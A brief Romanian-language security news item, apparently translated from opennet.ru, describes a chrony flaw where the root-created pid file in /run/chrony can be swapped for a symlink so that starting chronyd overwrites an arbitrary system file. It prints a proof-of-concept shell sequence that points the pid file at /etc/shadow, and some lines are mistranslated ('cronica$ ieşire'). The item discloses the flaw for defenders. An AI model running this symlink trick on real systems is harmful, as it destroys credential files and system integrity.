В
Vulnerabilitatea este cauzată de crearea nesigură a unui fișier pid, care a fost creat într-o etapă în care chrony nu resetase încă privilegiile și rula ca root. În acest caz, directorul /run/chrony, în care este scris fișierul pid, a fost creat cu drepturile 0750 prin systemd-tmpfiles sau când a fost lansat chronyd în asociere cu utilizatorul și grupul „chrony”. Astfel, dacă aveți acces la user chrony, este posibil să înlocuiți fișierul pid /run/chrony/chronyd.pid cu o legătură simbolică. O legătură simbolică poate indica orice fișier de sistem care va fi suprascris la lansarea chronyd.
root# systemctl stop chronyd.service
root# sudo -u chrony /bin/bash
chrony$ cd /run/chrony
chrony$ ln -s /etc/shadow chronyd.pid
cronica$ ieşire
root# /usr/sbin/chronyd -n
^C
# în loc de conținutul din /etc/shadow va fi salvat ID-ul procesului chronyd
root# cat /etc/shadow
15287
Vulnerabilitate
Problemă SUSE și openSUSE
Sursa: opennet.ru